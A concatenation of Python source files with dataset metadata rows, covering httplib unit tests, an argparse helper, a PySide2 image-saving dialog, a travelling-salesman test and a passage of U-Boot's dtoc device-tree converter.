            # appended, so duplicates are detectable.
            def __init__(self):
                self.count = {}
            def append(self, item):
                kv = item.split(':')
                if len(kv) > 1:
                    # item is a 'Key: Value' header string
                    lcKey = kv[0].lower()
                    self.count.setdefault(lcKey, 0)
                    self.count[lcKey] += 1
                list.append(self, item)

        for explicit_header in True, False:
            for header in 'Content-length', 'Host', 'Accept-encoding':
                conn = httplib.HTTPConnection('example.com')
                conn.sock = FakeSocket('blahblahblah')
                conn._buffer = HeaderCountingBuffer()

                body = 'spamspamspam'
                headers = {}
                if explicit_header:
                    headers[header] = str(len(body))
                conn.request('POST', '/', body, headers)
                # Whether supplied explicitly or auto-generated, each header
                # must appear exactly once.
                self.assertEqual(conn._buffer.count[header.lower()], 1)

    def test_putheader(self):
        # putheader() must accept a non-string value and stringify it.
        conn = httplib.HTTPConnection('example.com')
        conn.sock = FakeSocket(None)
        conn.putrequest('GET','/')
        conn.putheader('Content-length',42)
        self.assertTrue('Content-length: 42' in conn._buffer)

    def test_ipv6host_header(self):
        # Default Host header on an IPv6 transaction should be wrapped in []
        # when it is an actual IPv6 address.
        expected = 'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
                   'Accept-Encoding: identity\r\n\r\n'
        conn = httplib.HTTPConnection('[2001::]:81')
        sock = FakeSocket('')
        conn.sock = sock
        conn.request('GET', '/foo')
        self.assertTrue(sock.data.startswith(expected))

        # Without an explicit port the bracketed address stands alone.
        expected = 'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
                   'Accept-Encoding: identity\r\n\r\n'
        conn = httplib.HTTPConnection('[2001:102A::]')
        sock = FakeSocket('')
        conn.sock = sock
        conn.request('GET', '/foo')
        self.assertTrue(sock.data.startswith(expected))
class BasicTest(TestCase):
    """Core httplib behaviour: status lines, reads, chunking, limits."""

    def test_status_lines(self):
        # Test HTTP status lines
        body = "HTTP/1.1 200 Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = httplib.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(), 'Text')
        self.assertTrue(resp.isclosed())

        # A non-integer status code must raise BadStatusLine.
        body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = httplib.HTTPResponse(sock)
        self.assertRaises(httplib.BadStatusLine, resp.begin)

    def test_bad_status_repr(self):
        # repr() of BadStatusLine must include the (quoted) offending line.
        exc = httplib.BadStatusLine('')
        self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')

    def test_partial_reads(self):
        # if we have a length, the system knows when to close itself,
        # same behaviour as when we read the whole thing with read()
        body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
        sock = FakeSocket(body)
        resp = httplib.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(2), 'Te')
        self.assertFalse(resp.isclosed())
        self.assertEqual(resp.read(2), 'xt')
        self.assertTrue(resp.isclosed())

    def test_host_port(self):
        # Check invalid host_port
        # Note that httplib does not accept user:password@ in the host-port.
        for hp in ("www.python.org:abc", "user:password@www.python.org"):
            self.assertRaises(httplib.InvalidURL, httplib.HTTP, hp)

        # Valid host:port forms, including bracketed IPv6 literals.
        for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000", "fe80::207:e9ff:fe9b",
                          8000),
                         ("www.python.org:80", "www.python.org", 80),
                         ("www.python.org", "www.python.org", 80),
                         ("www.python.org:", "www.python.org", 80),
                         ("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80)):
            http = httplib.HTTP(hp)
            c = http._conn
            if h != c.host:
                self.fail("Host incorrectly parsed: %s != %s" % (h, c.host))
            if p != c.port:
                self.fail("Port incorrectly parsed: %s != %s" % (p, c.host))

    def test_response_headers(self):
        # test response with multiple message headers with the same field name.
        text = ('HTTP/1.1 200 OK\r\n'
                'Set-Cookie: Customer="WILE_E_COYOTE";'
                ' Version="1"; Path="/acme"\r\n'
                'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
                ' Path="/acme"\r\n'
                '\r\n'
                'No body\r\n')
        hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
               ', '
               'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
        s = FakeSocket(text)
        r = httplib.HTTPResponse(s)
        r.begin()
        # Repeated headers are joined with ", " per RFC 2616.
        cookies = r.getheader("Set-Cookie")
        if cookies != hdr:
            self.fail("multiple headers not combined properly")

    def test_read_head(self):
        # Test that the library doesn't attempt to read any data
        # from a HEAD request.  (Tickles SF bug #622042.)
        sock = FakeSocket(
            'HTTP/1.1 200 OK\r\n'
            'Content-Length: 14432\r\n'
            '\r\n',
            NoEOFStringIO)
        resp = httplib.HTTPResponse(sock, method="HEAD")
        resp.begin()
        if resp.read() != "":
            self.fail("Did not expect response from HEAD request")

    def test_send_file(self):
        # A file-like body should be streamed and a Content-Length emitted.
        expected = 'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
                   'Accept-Encoding: identity\r\nContent-Length:'

        body = open(__file__, 'rb')
        conn = httplib.HTTPConnection('example.com')
        sock = FakeSocket(body)
        conn.sock = sock
        conn.request('GET', '/foo', body)
        self.assertTrue(sock.data.startswith(expected))

    def test_send(self):
        # send() must accept str, array, and file-like objects alike.
        expected = 'this is a test this is only a test'
        conn = httplib.HTTPConnection('example.com')
        sock = FakeSocket(None)
        conn.sock = sock
        conn.send(expected)
        self.assertEqual(expected, sock.data)
        sock.data = ''
        conn.send(array.array('c', expected))
        self.assertEqual(expected, sock.data)
        sock.data = ''
        conn.send(StringIO.StringIO(expected))
        self.assertEqual(expected, sock.data)

    def test_chunked(self):
        chunked_start = (
            'HTTP/1.1 200 OK\r\n'
            'Transfer-Encoding: chunked\r\n\r\n'
            'a\r\n'
            'hello worl\r\n'
            '1\r\n'
            'd\r\n'
        )
        # A well-terminated chunked body decodes cleanly.
        sock = FakeSocket(chunked_start + '0\r\n')
        resp = httplib.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), 'hello world')
        resp.close()

        # A missing or malformed terminating chunk raises IncompleteRead,
        # carrying whatever was decoded so far.
        for x in ('', 'foo\r\n'):
            sock = FakeSocket(chunked_start + x)
            resp = httplib.HTTPResponse(sock, method="GET")
            resp.begin()
            try:
                resp.read()
            except httplib.IncompleteRead, i:
                self.assertEqual(i.partial, 'hello world')
                self.assertEqual(repr(i),'IncompleteRead(11 bytes read)')
                self.assertEqual(str(i),'IncompleteRead(11 bytes read)')
            else:
                self.fail('IncompleteRead expected')
            finally:
                resp.close()

    def test_chunked_head(self):
        # HEAD responses must not consume the chunked body.
        chunked_start = (
            'HTTP/1.1 200 OK\r\n'
            'Transfer-Encoding: chunked\r\n\r\n'
            'a\r\n'
            'hello world\r\n'
            '1\r\n'
            'd\r\n'
        )
        sock = FakeSocket(chunked_start + '0\r\n')
        resp = httplib.HTTPResponse(sock, method="HEAD")
        resp.begin()
        self.assertEqual(resp.read(), '')
        self.assertEqual(resp.status, 200)
        self.assertEqual(resp.reason, 'OK')
        self.assertTrue(resp.isclosed())

    def test_negative_content_length(self):
        # A negative Content-Length is treated as "read until EOF".
        sock = FakeSocket('HTTP/1.1 200 OK\r\n'
                          'Content-Length: -1\r\n\r\nHello\r\n')
        resp = httplib.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), 'Hello\r\n')
        resp.close()

    def test_incomplete_read(self):
        # Fewer body bytes than Content-Length promises -> IncompleteRead
        # reporting both what was read and what is still expected.
        sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
        resp = httplib.HTTPResponse(sock, method="GET")
        resp.begin()
        try:
            resp.read()
        except httplib.IncompleteRead as i:
            self.assertEqual(i.partial, 'Hello\r\n')
            self.assertEqual(repr(i),
                             "IncompleteRead(7 bytes read, 3 more expected)")
            self.assertEqual(str(i),
                             "IncompleteRead(7 bytes read, 3 more expected)")
        else:
            self.fail('IncompleteRead expected')
        finally:
            resp.close()

    def test_epipe(self):
        # A broken pipe mid-request must surface as socket.error, but the
        # already-received response should still be parseable.
        sock = EPipeSocket(
            "HTTP/1.0 401 Authorization Required\r\n"
            "Content-type: text/html\r\n"
            "WWW-Authenticate: Basic realm=\"example\"\r\n",
            b"Content-Length")
        conn = httplib.HTTPConnection("example.com")
        conn.sock = sock
        self.assertRaises(socket.error,
                          lambda: conn.request("PUT", "/url", "body"))
        resp = conn.getresponse()
        self.assertEqual(401, resp.status)
        self.assertEqual("Basic realm=\"example\"",
                         resp.getheader("www-authenticate"))

    def test_filenoattr(self):
        # Just test the fileno attribute in the HTTPResponse Object.
        body = "HTTP/1.1 200 Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = httplib.HTTPResponse(sock)
        self.assertTrue(hasattr(resp,'fileno'),
                'HTTPResponse should expose a fileno attribute')

    # Test lines overflowing the max line size (_MAXLINE in http.client)

    def test_overflowing_status_line(self):
        self.skipTest("disabled for HTTP 0.9 support")
        body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
        resp = httplib.HTTPResponse(FakeSocket(body))
        self.assertRaises((httplib.LineTooLong, httplib.BadStatusLine), resp.begin)

    def test_overflowing_header_line(self):
        # A single header line longer than _MAXLINE raises LineTooLong.
        body = (
            'HTTP/1.1 200 OK\r\n'
            'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
        )
        resp = httplib.HTTPResponse(FakeSocket(body))
        self.assertRaises(httplib.LineTooLong, resp.begin)

    def test_overflowing_chunked_line(self):
        # An over-long chunk-size line raises LineTooLong from read().
        body = (
            'HTTP/1.1 200 OK\r\n'
            'Transfer-Encoding: chunked\r\n\r\n'
            + '0' * 65536 + 'a\r\n'
            'hello world\r\n'
            '0\r\n'
        )
        resp = httplib.HTTPResponse(FakeSocket(body))
        resp.begin()
        self.assertRaises(httplib.LineTooLong, resp.read)
class OfflineTest(TestCase):
    """Checks that need no sockets or network at all."""

    def test_responses(self):
        # Each numeric status constant must map to its canonical reason phrase.
        reason = httplib.responses[httplib.NOT_FOUND]
        self.assertEqual(reason, "Not Found")
class SourceAddressTest(TestCase):
    """Tests for the source_address argument of HTTP(S)Connection."""

    def setUp(self):
        # A real listening socket plus a free port to bind the client side to.
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.port = test_support.bind_port(self.serv)
        self.source_port = test_support.find_unused_port()
        self.serv.listen(5)
        self.conn = None

    def tearDown(self):
        if self.conn:
            self.conn.close()
            self.conn = None
        self.serv.close()
        self.serv = None

    def testHTTPConnectionSourceAddress(self):
        # The connected socket's local port must be the requested source port.
        self.conn = httplib.HTTPConnection(HOST, self.port,
                source_address=('', self.source_port))
        self.conn.connect()
        self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)

    @unittest.skipIf(not hasattr(httplib, 'HTTPSConnection'),
                     'httplib.HTTPSConnection not defined')
    def testHTTPSConnectionSourceAddress(self):
        self.conn = httplib.HTTPSConnection(HOST, self.port,
                source_address=('', self.source_port))
        # We don't test anything here other than the constructor not barfing, as
        # this code doesn't deal with setting up an active running SSL server
        # for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
    """Tests that the timeout argument reaches the underlying socket."""

    PORT = None  # bound in setUp; shared with HTTPSTimeoutTest below

    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        TimeoutTest.PORT = test_support.bind_port(self.serv)
        self.serv.listen(5)

    def tearDown(self):
        self.serv.close()
        self.serv = None

    def testTimeoutAttribute(self):
        '''This will prove that the timeout gets through
        HTTPConnection and into the socket.
        '''
        # default -- use global socket timeout
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            httpConn = httplib.HTTPConnection(HOST, TimeoutTest.PORT)
            httpConn.connect()
        finally:
            # Always restore the global default so other tests are unaffected.
            socket.setdefaulttimeout(None)
        self.assertEqual(httpConn.sock.gettimeout(), 30)
        httpConn.close()

        # no timeout -- do not use global socket default
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            httpConn = httplib.HTTPConnection(HOST, TimeoutTest.PORT,
                                              timeout=None)
            httpConn.connect()
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(httpConn.sock.gettimeout(), None)
        httpConn.close()

        # a value -- an explicit timeout wins over any global default
        httpConn = httplib.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
        httpConn.connect()
        self.assertEqual(httpConn.sock.gettimeout(), 30)
        httpConn.close()
class HTTPSTimeoutTest(TestCase):
    # XXX Here should be tests for HTTPS, there isn't any right now!

    def test_attributes(self):
        """HTTPSConnection should store the timeout it was constructed with."""
        # simple test to check it's storing it
        if hasattr(httplib, 'HTTPSConnection'):
            h = httplib.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
            self.assertEqual(h.timeout, 30)

    @unittest.skipIf(not hasattr(httplib, 'HTTPS'), 'httplib.HTTPS not available')
    def test_host_port(self):
        """host:port strings must be parsed correctly (or rejected)."""
        # Check invalid host_port
        # Note that httplib does not accept user:password@ in the host-port.
        for hp in ("www.python.org:abc", "user:password@www.python.org"):
            self.assertRaises(httplib.InvalidURL, httplib.HTTP, hp)
        for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000", "fe80::207:e9ff:fe9b",
                          8000),
                         ("pypi.python.org:443", "pypi.python.org", 443),
                         ("pypi.python.org", "pypi.python.org", 443),
                         ("pypi.python.org:", "pypi.python.org", 443),
                         ("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443)):
            http = httplib.HTTPS(hp)
            c = http._conn
            if h != c.host:
                self.fail("Host incorrectly parsed: %s != %s" % (h, c.host))
            if p != c.port:
                # Bug fix: the failure message previously interpolated c.host
                # instead of c.port, hiding the actual mismatched value.
                self.fail("Port incorrectly parsed: %s != %s" % (p, c.port))
def test_main(verbose=None):
    """Run every test class in this module via the regrtest helper."""
    test_support.run_unittest(HeaderTests, OfflineTest, BasicTest, TimeoutTest,
                              HTTPSTimeoutTest, SourceAddressTest)

if __name__ == '__main__':
    test_main()
| 36.463983 | 83 | 0.573587 |
19b8c64e356d3b03bae64110d7d302def1744ed1 | 413 | py | Python | src/args.py | mradbourne/jump-to-py | 42688123cfdf3e40330b5859d911d84d9a7601ca | [
"MIT"
] | null | null | null | src/args.py | mradbourne/jump-to-py | 42688123cfdf3e40330b5859d911d84d9a7601ca | [
"MIT"
] | null | null | null | src/args.py | mradbourne/jump-to-py | 42688123cfdf3e40330b5859d911d84d9a7601ca | [
"MIT"
] | null | null | null | import argparse
def get_args():
    """Parse command-line arguments for the program.

    Returns:
        argparse.Namespace with:
          command: list of one or more positional command words.
          accumulate: ``sum`` when --sum is given, else ``max``.
            NOTE(review): --sum/accumulate looks like leftover argparse
            example code -- confirm it is actually used before removing it.
    """
    arg_parser = argparse.ArgumentParser(
        description='Run one or more commands.')
    # Help text fixed: the previous strings ("Process some integers.",
    # metavar 'N', "help here") were placeholders copied from the argparse
    # documentation example.
    arg_parser.add_argument('command', metavar='COMMAND', type=str, nargs='+',
                            help='command(s) to run')
    arg_parser.add_argument('--sum', dest='accumulate', action='store_const',
                            const=sum, default=max,
                            help='sum the integers (default: find the max)')
    return arg_parser.parse_args()
| 37.545455 | 78 | 0.68523 |
f2dc3e5ddf8d153d0a586aba52c1041f4d357b33 | 248 | py | Python | app_backend/databases/__init__.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 1 | 2020-06-21T04:08:26.000Z | 2020-06-21T04:08:26.000Z | app_backend/databases/__init__.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 13 | 2019-10-18T17:19:32.000Z | 2022-01-13T00:44:43.000Z | app_backend/databases/__init__.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 5 | 2019-02-07T03:15:16.000Z | 2021-09-04T14:06:28.000Z | #!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: __init__.py
@time: 2020-02-29 23:23
"""
def func():
    """Placeholder module-level function; intentionally does nothing."""
    return None
class Main(object):
    """Placeholder class; the constructor intentionally does nothing."""
    def __init__(self):
        pass
if __name__ == '__main__':
    # Nothing to do when this package module is executed directly.
    pass
| 10.782609 | 26 | 0.612903 |
080c2ca58684fc90bb1a6259d2b86d039199c176 | 710 | py | Python | tests/exercises/travelling_salesman_test.py | AlexandraImbrisca/nondeterminism | f7935e22e4127abfefb29b5331805172c94e22f9 | [
"MIT"
] | 2 | 2022-02-11T17:20:31.000Z | 2022-02-24T09:36:23.000Z | tests/exercises/travelling_salesman_test.py | AlexandraImbrisca/nondeterminism | f7935e22e4127abfefb29b5331805172c94e22f9 | [
"MIT"
] | null | null | null | tests/exercises/travelling_salesman_test.py | AlexandraImbrisca/nondeterminism | f7935e22e4127abfefb29b5331805172c94e22f9 | [
"MIT"
] | null | null | null | import unittest
from helpers import Graph
from exercises import travelling_salesman
class TestTravellingSalesman(unittest.TestCase):
    """Exercise travelling_salesman() on graphs with and without a tour."""

    def setUp(self):
        # g1 has an isolated vertex (3), so no tour can exist.
        self.g1 = Graph([1, 2, 3], [(1, 2)])
        # g2 is a 4-cycle; g3 is the complete graph K4.
        self.g2 = Graph([1, 2, 3, 4], [(1, 2), (1, 4), (2, 3), (3, 4)])
        self.g3 = Graph([1, 2, 3, 4],
                        [(1, 2), (1, 3), (1, 4), (2, 3), (2, 4), (3, 4)])

    def test_no_solution(self):
        self.assertFalse(travelling_salesman(self.g1))

    def test_valid_solution(self):
        self.assertTrue(travelling_salesman(self.g2))  # e.g. 1->2->3->4->1
        self.assertTrue(travelling_salesman(self.g3))  # e.g. 1->2->4->3->1
unittest.main()
| 30.869565 | 75 | 0.571831 |
c75d80e269c62703f6a2b6f394c1cf133bc9a570 | 3,682 | py | Python | hexrd/ui/save_images_dialog.py | HEXRD/hexrdgui | d92915463f237e0521b5830655ae73bc5bcd9f80 | [
"BSD-3-Clause"
] | 13 | 2020-02-18T00:23:02.000Z | 2022-02-24T20:04:36.000Z | hexrd/ui/save_images_dialog.py | HEXRD/hexrdgui | d92915463f237e0521b5830655ae73bc5bcd9f80 | [
"BSD-3-Clause"
] | 656 | 2020-01-14T02:33:40.000Z | 2022-03-26T15:31:17.000Z | hexrd/ui/save_images_dialog.py | HEXRD/hexrdgui | d92915463f237e0521b5830655ae73bc5bcd9f80 | [
"BSD-3-Clause"
] | 6 | 2020-01-17T15:02:53.000Z | 2020-11-01T22:02:48.000Z | from PySide2.QtCore import QThreadPool
from PySide2.QtWidgets import QFileDialog, QInputDialog
from hexrd.ui.hexrd_config import HexrdConfig
from hexrd.ui.image_load_manager import ImageLoadManager
from hexrd.ui.ui_loader import UiLoader
from hexrd.ui.progress_dialog import ProgressDialog
from hexrd.ui.async_worker import AsyncWorker
class SaveImagesDialog:
    """Dialog for exporting the current imageseries to files on disk."""

    def __init__(self, parent=None, ):
        loader = UiLoader()
        self.ui = loader.load_file('save_images_dialog.ui', parent)

        self.parent_dir = HexrdConfig().working_dir
        self.thread_pool = QThreadPool()
        self.progress_dialog = ProgressDialog(self.ui)

        self.setup_gui()
        self.setup_connections()

    def setup_gui(self):
        """Populate the detector list and the current-directory display."""
        self.ui.detectors.clear()
        self.ui.detectors.addItems(HexrdConfig().detector_names)
        self.ui.pwd.setText(self.parent_dir)
        self.ui.pwd.setToolTip(self.parent_dir)
        if HexrdConfig().unagg_images:
            self.ui.ignore_agg.setEnabled(True)

    def setup_connections(self):
        self.ui.single_detector.toggled.connect(self.ui.detectors.setEnabled)
        self.ui.change_directory.clicked.connect(self.change_directory)

    def change_directory(self):
        """Prompt for a new output directory and remember it."""
        # Bug fix: this used to be a chained assignment
        # (caption = HexrdConfig().images_dirtion = '...') which set a
        # misspelled attribute on the config object as a side effect.
        caption = 'Select directory for images'
        new_dir = QFileDialog.getExistingDirectory(
            self.ui, caption, dir=self.parent_dir)

        if new_dir:
            HexrdConfig().working_dir = new_dir
            self.parent_dir = new_dir
            self.ui.pwd.setText(self.parent_dir)
            self.ui.pwd.setToolTip(self.parent_dir)

    def save_images(self):
        """Save each selected detector's imageseries in a worker thread."""
        if self.ui.ignore_agg.isChecked():
            ims_dict = HexrdConfig().unagg_images
        else:
            ims_dict = HexrdConfig().imageseries_dict

        # All detectors by default; just the chosen one in single mode.
        dets = HexrdConfig().detector_names
        if self.ui.single_detector.isChecked():
            dets = [self.ui.detectors.currentText()]

        for det in dets:
            selected_format = self.ui.format.currentText().lower()
            filename = f'{self.ui.file_stem.text()}_{det}.{selected_format}'
            # Bug fix: 'filename' was computed but never used; the output
            # path (and window title below) carried a literal placeholder.
            path = f'{self.parent_dir}/{filename}'

            if selected_format.startswith('hdf5'):
                selected_format = 'hdf5'
            elif selected_format.startswith('npz'):
                selected_format = 'frame-cache'

            kwargs = {}
            if selected_format == 'hdf5':
                # A path must be specified. Set it ourselves for now.
                kwargs['path'] = 'imageseries'
            elif selected_format == 'frame-cache':
                # Get the user to pick a threshold
                result, ok = QInputDialog.getDouble(self.ui, 'HEXRD',
                                                    'Choose Threshold',
                                                    10, 0, 1e12, 3)
                if not ok:
                    # User canceled...
                    return

                kwargs['threshold'] = result
                # This needs to be specified, but I think it just needs
                # to be the same as the file name...
                kwargs['cache_file'] = path

            worker = AsyncWorker(
                HexrdConfig().save_imageseries,
                ims_dict.get(det), det, path, selected_format, **kwargs)
            self.thread_pool.start(worker)

            self.progress_dialog.setWindowTitle(f'Saving {filename}')
            # Range (0, 0) puts the progress bar in indeterminate mode.
            self.progress_dialog.setRange(0, 0)
            worker.signals.finished.connect(self.progress_dialog.accept)
            self.progress_dialog.exec_()

    def exec_(self):
        if self.ui.exec_():
            self.save_images()
| 38.757895 | 78 | 0.606464 |
11050b66f71057821f0a2076fcbba0a4ad6f734e | 13,390 | py | Python | Arty-Z7-10/components/ext_sources/u-boot-ectf/tools/dtoc/dtoc.py | UNO-NULLify/eCTF19 | 1c1220445187bccb15e099760ba6cc42768af24c | [
"Apache-2.0"
] | 31 | 2018-01-16T17:11:44.000Z | 2022-03-16T13:51:24.000Z | Arty-Z7-10/components/ext_sources/u-boot-ectf/tools/dtoc/dtoc.py | UNO-NULLify/eCTF19 | 1c1220445187bccb15e099760ba6cc42768af24c | [
"Apache-2.0"
] | 1 | 2021-04-29T09:08:08.000Z | 2021-05-08T07:57:06.000Z | Arty-Z7-10/components/ext_sources/u-boot-ectf/tools/dtoc/dtoc.py | UNO-NULLify/eCTF19 | 1c1220445187bccb15e099760ba6cc42768af24c | [
"Apache-2.0"
] | 30 | 2018-05-02T08:43:27.000Z | 2022-01-23T03:25:54.000Z | #!/usr/bin/python
#
# Copyright (C) 2016 Google, Inc
# Written by Simon Glass <sjg@chromium.org>
#
# SPDX-License-Identifier: GPL-2.0+
#
import copy
from optparse import OptionError, OptionParser
import os
import struct
import sys
# Bring in the patman libraries
our_path = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(our_path, '../patman'))
import fdt
import fdt_select
import fdt_util
# When we see these properties we ignore them - i.e. do not create a structure member
# When we see these properties we ignore them - i.e. do not create a structure member
PROP_IGNORE_LIST = [
    '#address-cells',
    '#gpio-cells',
    '#size-cells',
    'compatible',
    'linux,phandle',
    "status",
    'phandle',
    'u-boot,dm-pre-reloc',
]

# C type declarations for the types we support
TYPE_NAMES = {
    fdt.TYPE_INT: 'fdt32_t',
    fdt.TYPE_BYTE: 'unsigned char',
    fdt.TYPE_STRING: 'const char *',
    fdt.TYPE_BOOL: 'bool',
};

# Prefixes for generated C struct type names and platdata variable names
STRUCT_PREFIX = 'dtd_'
VAL_PREFIX = 'dtv_'
def Conv_name_to_c(name):
    """Convert a device-tree name to a C identifier

    Device-tree names may contain characters that are not valid in C
    identifiers ('@', '-', ',' and '/'); each is mapped to an
    underscore-based replacement.

    Args:
        name: Name to convert
    Return:
        String containing the C version of this name
    """
    # Same replacement order as before; the local used to be called 'str',
    # shadowing the builtin.
    result = name
    for char, replacement in (('@', '_at_'), ('-', '_'), (',', '_'),
                              ('/', '__')):
        result = result.replace(char, replacement)
    return result
def TabTo(num_tabs, str):
    """Pad a string with tabs out to column num_tabs * 8.

    If the string already reaches that column, a single space is appended
    instead so the next field is still separated.
    """
    target_col = num_tabs * 8
    if len(str) < target_col:
        return str + '\t' * (num_tabs - len(str) // 8)
    return str + ' '
class DtbPlatdata:
    """Provide a means to convert device tree binary data to platform data

    The output of this process is C structures which can be used in space-
    constrained environments where the ~3KB code overhead of device tree
    code is not affordable.

    Properties:
        fdt: Fdt object, referencing the device tree
        _dtb_fname: Filename of the input device tree binary file
        _valid_nodes: A list of Node object with compatible strings
        _options: Command-line options
        _phandle_node: A dict of Nodes indexed by phandle (an integer)
        _outfile: The current output file (sys.stdout or a real file)
        _lines: Stashed list of output lines for outputting in the future
    """
    def __init__(self, dtb_fname, options):
        self._dtb_fname = dtb_fname
        self._valid_nodes = None
        self._options = options
        self._phandle_node = {}
        self._outfile = None
        self._lines = []

    def SetupOutput(self, fname):
        """Set up the output destination

        Once this is done, future calls to self.Out() will output to this
        file.

        Args:
            fname: Filename to send output to, or '-' for stdout
        """
        if fname == '-':
            self._outfile = sys.stdout
        else:
            self._outfile = open(fname, 'w')

    def Out(self, str):
        """Output a string to the output file

        Args:
            str: String to output
        """
        self._outfile.write(str)

    def Buf(self, str):
        """Buffer up a string to send later

        Args:
            str: String to add to our 'buffer' list
        """
        self._lines.append(str)

    def GetBuf(self):
        """Get the contents of the output buffer, and clear it

        Returns:
            The output buffer, which is then cleared for future use
        """
        lines = self._lines
        self._lines = []
        return lines

    def GetValue(self, type, value):
        """Get a value as a C expression

        For integers this returns a byte-swapped (little-endian) hex string
        For bytes this returns a hex string, e.g. 0x12
        For strings this returns a literal string enclosed in quotes
        For booleans this return 'true'

        Args:
            type: Data type (fdt_util)
            value: Data value, as a string of bytes
        """
        if type == fdt.TYPE_INT:
            return '%#x' % fdt_util.fdt32_to_cpu(value)
        elif type == fdt.TYPE_BYTE:
            return '%#x' % ord(value[0])
        elif type == fdt.TYPE_STRING:
            return '"%s"' % value
        elif type == fdt.TYPE_BOOL:
            return 'true'

    def GetCompatName(self, node):
        """Get a node's first compatible string as a C identifier

        Args:
            node: Node object to check
        Return:
            C identifier for the first compatible string
        """
        compat = node.props['compatible'].value
        if type(compat) == list:
            compat = compat[0]
        return Conv_name_to_c(compat)

    def ScanDtb(self):
        """Scan the device tree to obtain a tree of nodes and properties

        Once this is done, self.fdt.GetRoot() can be called to obtain the
        device tree root node, and progress from there.
        """
        self.fdt = fdt_select.FdtScan(self._dtb_fname)

    def ScanTree(self):
        """Scan the device tree for useful information

        This fills in the following properties:
            _phandle_node: A dict of Nodes indexed by phandle (an integer)
            _valid_nodes: A list of nodes we wish to consider include in the
                platform data
        """
        node_list = []
        self._phandle_node = {}
        for node in self.fdt.GetRoot().subnodes:
            if 'compatible' in node.props:
                status = node.props.get('status')
                # NOTE(review): this reads the module-level 'options' (set at
                # script scope below), not self._options -- confirm intended.
                if (not options.include_disabled and not status or
                    status.value != 'disabled'):
                    node_list.append(node)
            phandle_prop = node.props.get('phandle')
            if phandle_prop:
                phandle = phandle_prop.GetPhandle()
                self._phandle_node[phandle] = node
        self._valid_nodes = node_list

    def IsPhandle(self, prop):
        """Check if a node contains phandles

        We have no reliable way of detecting whether a node uses a phandle
        or not. As an interim measure, use a list of known property names.

        Args:
            prop: Prop object to check
        Return:
            True if the object value contains phandles, else False
        """
        if prop.name in ['clocks']:
            return True
        return False

    def ScanStructs(self):
        """Scan the device tree building up the C structures we will use.

        Build a dict keyed by C struct name containing a dict of Prop
        object for each struct field (keyed by property name). Where the
        same struct appears multiple times, try to use the 'widest'
        property, i.e. the one with a type which can express all others.

        Once the widest property is determined, all other properties are
        updated to match that width.
        """
        structs = {}
        for node in self._valid_nodes:
            node_name = self.GetCompatName(node)
            fields = {}

            # Get a list of all the valid properties in this node.
            for name, prop in node.props.items():
                if name not in PROP_IGNORE_LIST and name[0] != '#':
                    fields[name] = copy.deepcopy(prop)

            # If we've seen this node_name before, update the existing struct.
            if node_name in structs:
                struct = structs[node_name]
                for name, prop in fields.items():
                    oldprop = struct.get(name)
                    if oldprop:
                        oldprop.Widen(prop)
                    else:
                        struct[name] = prop

            # Otherwise store this as a new struct.
            else:
                structs[node_name] = fields

        # Second pass: widen each node's own properties to match the final
        # (widest) version recorded in the struct.
        upto = 0
        for node in self._valid_nodes:
            node_name = self.GetCompatName(node)
            struct = structs[node_name]
            for name, prop in node.props.items():
                if name not in PROP_IGNORE_LIST and name[0] != '#':
                    prop.Widen(struct[name])
            upto += 1
        return structs

    def GenerateStructs(self, structs):
        """Generate struct definitions for the platform data

        This writes out the body of a header file consisting of structure
        definitions for node in self._valid_nodes. See the documentation in
        README.of-plat for more information.
        """
        self.Out('#include <stdbool.h>\n')
        self.Out('#include <libfdt.h>\n')

        # Output the struct definition
        for name in sorted(structs):
            self.Out('struct %s%s {\n' % (STRUCT_PREFIX, name));
            for pname in sorted(structs[name]):
                prop = structs[name][pname]
                if self.IsPhandle(prop):
                    # For phandles, include a reference to the target
                    self.Out('\t%s%s[%d]' % (TabTo(2, 'struct phandle_2_cell'),
                                             Conv_name_to_c(prop.name),
                                             len(prop.value) / 2))
                else:
                    ptype = TYPE_NAMES[prop.type]
                    self.Out('\t%s%s' % (TabTo(2, ptype),
                                         Conv_name_to_c(prop.name)))
                    if type(prop.value) == list:
                        self.Out('[%d]' % len(prop.value))
